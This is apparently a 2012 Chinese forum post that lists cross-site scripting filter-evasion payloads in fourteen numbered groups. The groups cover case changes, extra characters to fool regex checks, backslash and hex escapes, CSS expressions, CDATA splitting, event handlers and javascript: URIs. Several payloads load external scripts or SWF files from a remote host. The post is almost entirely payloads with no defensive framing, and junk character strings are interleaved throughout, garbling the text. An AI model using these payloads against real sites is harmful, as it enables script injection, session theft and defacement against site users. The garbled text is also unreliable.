1. 改变字符大小写 q% Q) K* ], p! Y/ q, U. Q
m$ e1 d7 v2 v
% r0 n# y$ I! b
' j8 V& J8 v4 |' _3 p# f. d <sCript>alert(‘d’)</scRipT>, b% e0 z, s/ ?
9 _& z7 O& J8 Q+ @$ M2 q* Q3 N8 f
2. 利用多加一些其它字符来规避Regular Expression的检查& Y& Q3 {4 f. C& o
2 w7 r& `: X8 H7 \* C+ R
<<script>alert(‘c’)//<</script>
" V( }; B3 c3 Y
% B+ |+ R: T, p( o, U4 Y, S, h$ ] <SCRIPT a=">" SRC="t.js"></SCRIPT>
! E% U+ u# }2 z* ~1 g5 \0 ~" u; n5 K3 y' U
<SCRIPT =">" SRC="t.js"></SCRIPT>
( x$ z3 _& h- r2 L
4 L7 q/ r% j% b <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
i2 t$ G* M' Z5 u+ ?0 P" k; L8 G5 V; p/ ?! f
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
* @' q8 J2 G0 f/ ~' l
7 k- U# z' d( }6 f( w! C- o1 {+ W$ E <SCRIPT a=`>` SRC="t.js"></SCRIPT>4 M2 A2 x8 K6 y$ Z& P
' Y( C* c: D* \, a$ [/ G <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
1 f, K% l P! W" Y6 a: s1 T0 c6 y3 f
3. 以其它扩展名取代.js; F9 K$ m% `% u% Z6 U
; G, V$ E) ~, G <script src="bad.jpg"></script>
; n" U3 H; s$ o4 t3 x5 E4 {
. {4 @3 x3 J9 d# W7 b4. 将Javascript写在CSS档里* } I, j) `! E. K5 {) B5 o! i% i
. B; A6 S: ^. U( O <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">7 }, v: S: K) ~' h3 n
* F& }& z) P5 r" g9 k: i0 _
example:6 P S F7 Y4 J1 }' w0 T2 t* P# M
" v" _. |1 ?& O! T5 D# s, { body {8 b2 X. s* w5 ^. k
( r3 I9 y5 H* E9 k8 }: j
background-image: url(‘javascript:alert("XSS");’)
1 V' o' e3 ^6 h) @5 K" W5 ]8 g; u( H/ N' [& T5 @# v. W- C& y
}% U! Y2 L F+ h$ g
; `" w' R* U* w4 J; n0 y ^+ ^
5. 在script的tag里加入一些其它字符
* q- |% G2 ?# j, a/ `# I( G1 z, A
<SCRIPT/SRC="t.js"></SCRIPT># q! F+ I. Q: r! e) E: Y/ Q
0 [$ y+ ?# @. j3 U" i+ E3 X# l <SCRIPT/anyword SRC="t.js"></SCRIPT>
! a* h* @0 `6 X7 U0 B: h* d6 t9 `8 v9 ~ S. w* o) R% E& L9 ]- r
6. 使用tab或是new line来规避; T2 Z" x& X; k$ w2 o
7 E$ O9 U) l2 I% a
<img src="jav ascr ipt:alert(‘XSS3′)">
. Q, |" X) w& k. b% O0 w/ F a+ u U; m9 R: B& N! ~
<img src="jav ascr ipt:alert(‘XSS3′)">
5 _; o, D3 V6 ]- P1 P
. b4 U8 p$ a. T4 s R <IMG SRC="jav ascript:alert(‘XSS’);">
4 f8 ~- r$ ^# S9 \, L% [( u! {) n, h' y' {$ L( U3 ?6 b1 V% k
-> tag9 r) j! i% U+ h2 }$ O
9 P! E5 i+ [( y) p) s -> new line
# X( q/ e2 l! M- H" D. Q! ]. ]" f, T) n! }1 B4 i9 E
7. 使用"\"来规避
: D f' [% u0 H3 E
- B. w6 d# P7 k1 ^5 }: ?$ B <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>8 p+ w% f3 ^5 @8 q1 {
& h. V d8 k, \4 ~$ K6 Y" q <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>4 Q; w+ @4 T( R! _$ W) S' T
9 z7 `0 [% ?; C# g9 p/ E1 { <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
, K9 u2 v, W2 H7 i$ ?
0 n5 r. Y0 t. p8 u <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">- o' S' h" F/ }0 ~
, Z1 q2 ?! t: z( d+ W- @2 p* F
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>! ^4 e" `' _0 V& |0 o
! w; E7 x( [# O. U+ N
8. 使用Hex encode来规避(也可能会把";"拿掉)
+ u% @$ ?% B, B( Y4 l$ G% m' Q
# s" \. D. f6 i <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">; \9 O6 k7 m5 E
o9 `$ R, } G" W( D 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
3 A# n5 g8 x2 l7 y+ K7 d$ z" U8 ~+ X5 `6 `( C, B
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">/ E" U. V9 t3 O: A/ E
, u6 F- K. f/ Z5 M 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">" c& |5 `3 r8 w2 f5 j. z- `9 Q
3 `3 |. [( L. c9. script in HTML tag5 c ?! `5 P! z2 [, b" }
m3 L2 ~7 l/ x" @" K. B3 P! D+ G <body onload=」alert(‘onload’)」>9 o) G$ D, `" d7 @4 Y
. s: s0 T1 e; M/ @ onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
- b8 e! p( W) e) Y0 g+ V$ H; m
$ ~/ B, V# T2 p K3 s10. 在swf里含有xss的code9 A0 o5 P/ G- a" g% u! k, s/ S' w, V
5 D3 @; H8 ~% T) l3 z3 T2 T <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
! @2 N" g ~7 G9 K( j
& i9 c# t8 m" m& n& f11. 利用CDATA将xss的code拆开,再组合起来。9 x3 v! m6 E8 V$ S Z
, p1 y& R9 x, Q# l. z9 a9 e <XML ID=I><X><C>' f$ q1 _0 X8 I6 s: S
; U5 O$ ~0 }; \; U
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>1 r- @2 c$ L5 |
f* [6 v! S! t </C></X>4 C, m9 p7 h' `7 p d. }
: R: J# T+ H" f. y& v </xml>
* Y$ ~; T9 f1 I5 x( E. P7 H! V2 _
$ G" E& U4 r" k+ M <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>. r) D9 t, K' V" }3 B
U" R, C& q: j
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>1 b. K/ A; R3 {; E# P" `* ]& H
% Y. k; K) q4 y2 Q0 n$ p
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
6 q$ A* |+ x5 s2 J1 K! B, s. i1 [; Q! q
12. 利用HTML+TIME。
K( E$ o1 `+ `) |4 c3 Q9 t/ A' ?# y& A
<HTML><BODY>
) b, y1 h# R7 I4 @- t0 u
0 S9 C! Q/ Y0 p7 u <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">0 g( s7 `- |. R( v- d5 s
% X4 [$ e( Z% J& N. F- m/ H <?import namespace="t" implementation="#default#time2">
0 @" ~; B: G* L( _' N7 a, i0 U$ K. \0 W- Z5 Y; z
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
1 K( S+ q0 J* G+ V' y9 Z. o! {* R+ ~. x" |* Y' }# _8 z( }
</BODY></HTML>0 T. d$ i$ A7 [
& Z. u' ^- y% B5 [! d7 N
13. 透过META写入Cookie。
0 r9 D" V) B; s+ w$ d) c1 ]' _' X) _ `, l, z# B
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">2 ~4 Y8 E7 J$ S) Q7 A0 T% {* l$ t
' q$ Y" R! i& e2 N9 b" J5 L; P
14. javascript in src , href , url# R6 ^5 Y& j, e/ K- P' M( E
& k: O: w: j4 \6 U# [3 d4 ~" } <IFRAME SRC=javascript:alert(’13′)></IFRAME>
! u3 `. b. o1 C
6 o- Z1 x4 m. D& ^8 ? <img src="javascript:alert(‘XSS3′)">4 g" u$ G, }, |' Z7 ?1 e4 I! U0 I% H
1 a% L9 U: A! G' ]1 x; _<IMG DYNSRC="javascript:alert(‘XSS20′)">
1 ~; a! u+ e' Z# P% u( v5 Q; q1 [" `& w
<IMG LOWSRC="javascript:alert(‘XSS21′)">
# c. T& E8 f1 n6 {- S1 z& |6 [) N5 K
; y7 G6 \2 Z1 N0 B) K8 s <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
, E8 Z2 }0 h I$ z% D" G
: _' G2 d9 }1 U+ _0 W <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
. Z/ {' b) \, R8 |. _; Z. W1 d6 O, Z, {8 [; x( J- ^/ y" D
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
1 b L6 D3 j* R* P4 g, M. _2 i& I& ]( ]( Z
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">. r: |" X8 b l5 q7 C
7 B4 `( k1 L! v2 g2 B6 m8 u0 \
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
* |. c* \- s+ f% T2 ^. A! w1 R4 ^- d/ j9 c8 p- }7 q
</STYLE><A CLASS=XSS></A>
" T" O& G/ d; d) W* r- C+ G& i. W+ j' A3 H r
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>& ^$ j) O2 H: y
0 b8 S' _7 ?& t8 G5 p6 c |
发表于 2012-12-31 09:59:28
收藏
支持
反对